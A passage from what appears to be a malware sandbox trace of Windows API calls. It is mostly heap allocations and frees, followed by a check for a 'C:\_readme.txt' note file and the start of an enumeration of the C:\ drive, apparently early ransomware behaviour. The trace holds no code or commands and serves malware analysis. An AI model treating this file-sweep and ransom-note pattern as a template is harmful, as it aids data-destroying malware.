(HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.419] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x3a65050 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x3a65050 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.421] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.422] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.422] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x3a65050 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.423] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.423] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.423] PathFindFileNameW (pszPath="") returned="" [0146.423] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.424] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.424] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x3a65050 [0146.424] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a65050 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.424] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.424] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.424] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.424] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.424] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.424] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.424] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x806) returned 0x3a65050 [0146.424] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0146.424] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.424] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0146.425] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.426] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3220d58 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c) returned 0x3240780 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.426] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1fd20050, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1fd20050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x38) returned 0x3220d98 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.426] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0146.426] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0146.426] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1ea3b1b0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ea3b1b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x54) returned 0x3216cb0 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.426] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.426] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3220d98 | out: hHeap=0x6e0000) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.427] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x70) returned 0x31f3c20 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3216cb0 | out: hHeap=0x6e0000) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.427] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x47ee57a0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0146.427] FindNextFileW (in: hFindFile=0x3220d58, 